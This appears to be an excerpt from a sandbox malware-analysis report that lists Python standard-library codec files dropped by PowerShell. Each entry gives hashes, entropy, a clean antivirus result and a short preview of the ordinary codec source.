                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WlHhsuOTDvRT7ZpouhIAs2+iEh+GsHlIu/lwqBxTj/Fq3FHEj:rTCuhIAl6+GeJ/Wa3QVQ
                                                                                                                                                                                                              MD5:338143EC1BC5F5DDE251657BECC4667A
                                                                                                                                                                                                              SHA1:E68BFEAB6E5209748AC47B44505E6CA581141647
                                                                                                                                                                                                              SHA-256:4C67D361F922B611213FD8FEB9FCAAA9FF8CB57CD961F1CA1B5CF4483B1DEE66
                                                                                                                                                                                                              SHA-512:D58D0F6309FCF945FF25F7B5D825E8BAB1BFBDB40490110ADBA51B587AED5BE101A22C22CA99B9A4FF9B355F8E7980A713EA6CDD550403B37915EB79796E8A39
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec mac_greek generated from 'MAPPINGS/VENDORS/APPLE/GREEK.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-greek',.. e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13805
                                                                                                                                                                                                              Entropy (8bit):4.569004919357403
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:+HhsuOTDvRB7ZpouhIAs2+iy2wkKY2gKPeqBamec6U6+8:LTcuhIAl+k3LFam
                                                                                                                                                                                                              MD5:8FF7EE70CFFA2B336AEE3367796C96ED
                                                                                                                                                                                                              SHA1:1F26D1C59F9A124AD334FB2BB3FC1E3D605587FA
                                                                                                                                                                                                              SHA-256:64DE55FD0EA0FE4D2512B2303DCB3D20CC57061D78D08A11D3AA6F19E1877826
                                                                                                                                                                                                              SHA-512:6D0A64EBFA6F29FD5317043F9C08D0D1F68A39B6640615B2EF093C99629479CE8562C29AEA6509E2FEB255BFE93D0E9FCE9FB1DB43F86F17FE366ADC2788FC7F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec mac_iceland generated from 'MAPPINGS/VENDORS/APPLE/ICELAND.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-iceland',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14430
                                                                                                                                                                                                              Entropy (8bit):4.621572363853459
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:S3hsuOTDvRNUrXPLouhIAs2+iDK19L4vJPeqB48:hTnuhIAlmP4EaD
                                                                                                                                                                                                              MD5:BAF2B9E09D011F78EA36ED2CC5ED22FD
                                                                                                                                                                                                              SHA1:77B62918E1FAFD837EEE086C552265384BB506B4
                                                                                                                                                                                                              SHA-256:74C9045009FABFFA3E81B5B41D97A85860BA42D109DB6673A276EA8BA9B59E56
                                                                                                                                                                                                              SHA-512:5FB69F8A5FB424B7872B3872CB75B3B538A35533BFE8F8AFFEC44D82B372C866D1841B2568680ACB954CEB696A92EE3091DC06F04EA89DB5651F35F5667B6DA1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec mac_latin2 generated from 'MAPPINGS/VENDORS/MICSFT/MAC/LATIN2.TXT' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(C
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13787
                                                                                                                                                                                                              Entropy (8bit):4.580644681215749
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:wHhsuOTDvR27ZpouhIAs2+iy2w4KY2gKPeqBaoG5:tT/uhIAl+43LFaW
                                                                                                                                                                                                              MD5:1F99EDC6D4A3BA200295364C52D6038D
                                                                                                                                                                                                              SHA1:8FD1FF1EEC2F74907935621572360E7E53FE7038
                                                                                                                                                                                                              SHA-256:6BF6FDE10F2350232DE5EE47D27CAE885362602443B59A924DE8EB6998B18BB2
                                                                                                                                                                                                              SHA-512:2924BFF1C570128D57711F91CE1A87B5D156A24144FA3FEBDDDF6C9BB7B82570FB1F9B9FB1C5D23CD9625BF5568F42B718DB3A432F35B47DFF9E72FAE199EA56
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec mac_roman generated from 'MAPPINGS/VENDORS/APPLE/ROMAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-roman',.. e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13968
                                                                                                                                                                                                              Entropy (8bit):4.599704767840293
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:FqHhsuOTDvR+7ZpouhIAs2+iy2w4kyYpDgKPeqBaj5:FHTvuhIAl+4cqFaI
                                                                                                                                                                                                              MD5:425337635E74A8B98CD770F43848AF18
                                                                                                                                                                                                              SHA1:C0F5A92D564177C49E76471117E4B521FD52DF17
                                                                                                                                                                                                              SHA-256:1DE13F2703A62479C4312F9A39514C7691CF7F737958B3915AF395A53A596183
                                                                                                                                                                                                              SHA-512:853EC8BEB168F69C36AEA83AE221AEADE920DD293928B6F9F61F8938955DF3C709169424D93F49EE05CE2C1AD487CE925808CB136CA91C5022BAD6404008AF6A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec mac_romanian generated from 'MAPPINGS/VENDORS/APPLE/ROMANIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-romanian',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13820
                                                                                                                                                                                                              Entropy (8bit):4.579994522132136
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:yHhsuOTDvRT7ZpouhIAs2+iy2w4KY2gKPeqB9NGc:/TquhIAl+43LFal
                                                                                                                                                                                                              MD5:1C214A3F28D2D23CC7FDED7A387585A0
                                                                                                                                                                                                              SHA1:B40E5DA5FD44499B161BD2649A6258C9A968D5D5
                                                                                                                                                                                                              SHA-256:E7F9E6C9F92513C69754AEF1D7AB235B09E9EEADBBCED4C86DF6E2AA2D06A1EF
                                                                                                                                                                                                              SHA-512:58C6B56938D709AFC4E756C2F0CC40812724B963B118CE5E1CA84798DFD17F9E324AC8F5B68FA84FE883E91CBEA8E7FC4BBE32EAE175F1B55072FAAFA7F7397A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec mac_turkish generated from 'MAPPINGS/VENDORS/APPLE/TURKISH.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-turkish',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1258
                                                                                                                                                                                                              Entropy (8bit):4.753222127608113
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JwEFOXxVaniSdZSHvcGWQvnNq1I5atMufnb+s0ktzE9ZKj94JxFplR:JwEWxVaniSvIvdvNq1I5aCuzbztzETK2
                                                                                                                                                                                                              MD5:0D4DEB48618561417DDE714ACF399AA3
                                                                                                                                                                                                              SHA1:F617D8FC1B17AEC713947CDEE9BA302B4B2E71B1
                                                                                                                                                                                                              SHA-256:B00887A6D93C97D320CBB1C3379BD7C6DE767CCFC34ED13442891E06CC62F148
                                                                                                                                                                                                              SHA-512:722C9182DEAF8A8A65550EF86F967A559105BE6EB61C9FB3244521D51649B8A2B901E911A28FBB0CC42F1E680ACD0FC64B475E53DEE921287010EE112D982630
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'mbcs' Codec for Windows......Cloned by Mark Hammond (mhammond@skippinet.com.au) from ascii.py,..which was written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import mbcs_encode, mbcs_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = mbcs_encode....def decode(input, errors='strict'):.. return mbcs_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return mbcs_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = mbcs_decode....class StreamWriter(codecs.StreamWriter):.. encode = mbcs_encode....class StreamReader(codecs.StreamReader):.. decode = mbcs_decode....### encodings module API....def getregentry():.. return codecs
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1060
                                                                                                                                                                                                              Entropy (8bit):4.538507695911449
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JkZSHvcGW6pjvneEq1IhhatMufko3b+00kwWzu9ZKj9wJxFplR:JSIvvBvPq1IhhaCu8M1zPzuTKiJxTz
                                                                                                                                                                                                              MD5:5163EF7B87B6DEE11BC7914E2AB1FF8E
                                                                                                                                                                                                              SHA1:92EB877FD4F77A40FC6745717139D4E335670613
                                                                                                                                                                                                              SHA-256:991D1FD2F4B815943EAE7F7BFA9F87E2DE980ACB08932BEA3258FB034902A15F
                                                                                                                                                                                                              SHA-512:99458C11DB86287A818176588DEBD76AD18401557B7D49F01FCFA85C917947CDADC310DEF539434824997922CB24005853751920EAE103B0DB04A83AB3A49E46
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'oem' Codec for Windows...."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import oem_encode, oem_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = oem_encode....def decode(input, errors='strict'):.. return oem_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return oem_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = oem_decode....class StreamWriter(codecs.StreamWriter):.. encode = oem_encode....class StreamReader(codecs.StreamReader):.. decode = oem_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='oem',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreade
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13827
                                                                                                                                                                                                              Entropy (8bit):4.583791210166393
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:7hsuOTDvR1UrXPLouhIAs2+iXIcDCYBZt6CJTd12:mTDuhIAlX9Zt680
                                                                                                                                                                                                              MD5:3D512E1AB4D97E95DCEE526F991E685F
                                                                                                                                                                                                              SHA1:0349C9649CC54002699DD48E80DA09DDC21F9432
                                                                                                                                                                                                              SHA-256:C9E5D71C1FA128602E2D10E9BED0B271132DF349290F4465CFCA9D5DAA5BA86C
                                                                                                                                                                                                              SHA-512:DB6CE7BF928D829175D54328A6A37F1A8B691B04CEF1C76CE0C98B6B2C21959DF7BCA822416BFF39C2530E93F8B15CCB55E480FD1187C6258734923A10CF9878
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec for PalmOS 3.5.....Written by Sjoerd Mullender (sjoerd@acm.org); based on iso8859_15.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='palmos',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14327
                                                                                                                                                                                                              Entropy (8bit):4.653952382312946
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:63hsuOTDvRmUrXPLouhIAs2+iRQCzJHDCYbtlqtEDp+/:ZTsuhIAlXzJHftlqtEo/
                                                                                                                                                                                                              MD5:6EE7970BA64A9E17B3246A28C7CECD28
                                                                                                                                                                                                              SHA1:6B56118465C3E53A7E6C0BECE694E3643B485FC0
                                                                                                                                                                                                              SHA-256:F3BDA3C1415D37DD1C314E3F474529913F36F7021279D82DED0D11154EED55F2
                                                                                                                                                                                                              SHA-512:FAA196E1B4CCEEB771F9EC19E528696B35EAD5AC6CF1EF53DA092F75DB701FB59DBBA7FACEF3F169BC4D6DBF9336D250E0F4B9DFEE9EF2DCAD32C0FAD31C8A93
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'PTCP154.txt' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7120
                                                                                                                                                                                                              Entropy (8bit):4.519199483696464
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:l3Dt9EqNFDPf3rBEX2M+4lCQ57+K6AWujvRI3:lRSO/SLV5SZ
                                                                                                                                                                                                              MD5:DB14BE3F7A2ADCBCC07E2A32AD0A7198
                                                                                                                                                                                                              SHA1:A4F5C43558E47C3F89EB807FEFB2F49119D51B75
                                                                                                                                                                                                              SHA-256:823D1424AFA9508EA425F667F787567C80A6A28AE9742C66AA90A829ACC19748
                                                                                                                                                                                                              SHA-512:5D572DF2302FF9F74BB4E5F884F8057CDEDFB7BC6C53E82809627BD982104CB42A595B3001C8B65E5C087E94CBEDBC088951ED0EBF0D3AE3C4D88823F3C89BA6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Codec for the Punicode encoding, as specified in RFC 3492....Written by Martin v. L.wis..."""....import codecs....##################### Encoding #####################################....def segregate(str):.. """3.1 Basic code point segregation""".. base = bytearray().. extended = set().. for c in str:.. if ord(c) < 128:.. base.append(ord(c)).. else:.. extended.add(c).. extended = sorted(extended).. return bytes(base), extended....def selective_len(str, max):.. """Return the length of str, considering only characters below max.""".. res = 0.. for c in str:.. if ord(c) < max:.. res += 1.. return res....def selective_find(str, char, index, pos):.. """Return a pair (index, pos), indicating the next occurrence of.. char in str. index is the position of the character considering.. only ordinals up to and including char, and pos is the position in.. the full string. index/pos is the starting p
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1581
                                                                                                                                                                                                              Entropy (8bit):4.656023184812778
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:5UeC1AIc1eq1AIrZ1+A1+0uwY+vIvBTKXgCJxHjH:5Uj7c1P7rZdBu6AJTKVrH
                                                                                                                                                                                                              MD5:096A80038FB883522A68E9E6C434C6A6
                                                                                                                                                                                                              SHA1:3FAFAD17359B000B8A417446E15D69EEE44A10B2
                                                                                                                                                                                                              SHA-256:4BF9A405B6F2359E5B931E0D9FB9BD9609B013688CE2E58AEBBD9BFCB119A356
                                                                                                                                                                                                              SHA-512:8088AE700A1C85C55BA10FE47EEC68193497DDC5145069C48D258604273F284F46A42D5F83D43D826A2C11CB1E71692A0D4D15005D63800F072DD883BA7890BB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""Codec for quoted-printable encoding.....This codec de/encodes from bytes to bytes..."""....import codecs..import quopri..from io import BytesIO....def quopri_encode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.encode(f, g, quotetabs=True).. return (g.getvalue(), len(input))....def quopri_decode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.decode(f, g).. return (g.getvalue(), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return quopri_encode(input, errors).. def decode(self, input, errors='strict'):.. return quopri_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return quopri_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1378
                                                                                                                                                                                                              Entropy (8bit):4.688171660474759
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JKmSEHV0yWfBx1yWfB8MufQfBxCb+nh5fBiiUQWSJzWSmi1GfBX9ZKj9UnQJxlTt:JVST31u0WMp6SJ6SL1CBTKanQJxHf
                                                                                                                                                                                                              MD5:7B4C09E92D59EF6722DFCB9C79B792A7
                                                                                                                                                                                                              SHA1:F413714763D5BC134CE873FEB69A4D79735C381B
                                                                                                                                                                                                              SHA-256:2CC24FFC2D06CAB80423ADA94E3DFFC02C010346E17EFC2FFFE86825A6E07808
                                                                                                                                                                                                              SHA-512:9584CF7FDC438C9E1D00CA3387A3F8AF103B3DDB41A65768131ACC5F3E7D40AF180D1991EF613451B2736E20D963BD2EC08F48106C15146134C8A42BB6A64D3A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'raw-unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.raw_unicode_escape_encode.. decode = codecs.raw_unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.raw_unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.raw_unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.raw_unicode_escape_dec
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2561
                                                                                                                                                                                                              Entropy (8bit):4.800734764439435
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:7Hk1rNJm1rNJbuvNJTNJi6SJ6S0TK/JxHjRohn3xrUAosYDYKQyaDl:7EvJmvJbu1JRJivCTK/rSh1U8eSyol
                                                                                                                                                                                                              MD5:15F4EDEE2C94C2FB2F07435332C7A25A
                                                                                                                                                                                                              SHA1:D110DE2410DE8170389F26082E79C33EA643C991
                                                                                                                                                                                                              SHA-256:DC6052650356095A92A8CB3A6C63300B7F51A63B6CD3B6F636350B5F22CDA32A
                                                                                                                                                                                                              SHA-512:B9A21BB0C6AF53193088CAAF45FD94AAC472FD87927281198D88E70DE07F5D938CCAE2D081D737DEA9C6D11ACB53DCF1E2E855B464DA9871B99D522692492EBD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:#!/usr/bin/env python..""" Python Character Mapping Codec for ROT13.....This codec de/encodes from str to str.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input)).... def decode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input))....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return str.translate(input, rot13_map)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return str.translate(input, rot13_map)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='rot-13',.. encode=Codec().encod
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1078
                                                                                                                                                                                                              Entropy (8bit):4.563549974626686
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:n5SqSOzff/XokKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9RcJxFplR:5Sqfwm62VJjRU8njOxLnrxLbrLKUJxTz
                                                                                                                                                                                                              MD5:9C02A2E9711192F5738426F6E7285B5C
                                                                                                                                                                                                              SHA1:6AF9532F9C07B806DBA9D248A17E14B3EE637B1C
                                                                                                                                                                                                              SHA-256:195C87BF032904002D5ADB51C256AE14D99F4A69FFC15C989CA34DD51FC203D7
                                                                                                                                                                                                              SHA-512:3607DA04E5A83C27B8F6F3223872BF7957B58EA8326E19ECEB6A5836DD4E35B1A27CF43BBB4250E0CF0B931BB4BBEF6290FB6D30BEF407CC8C137277DBEB85D2
                                                                                                                                                                                                              Malicious:false
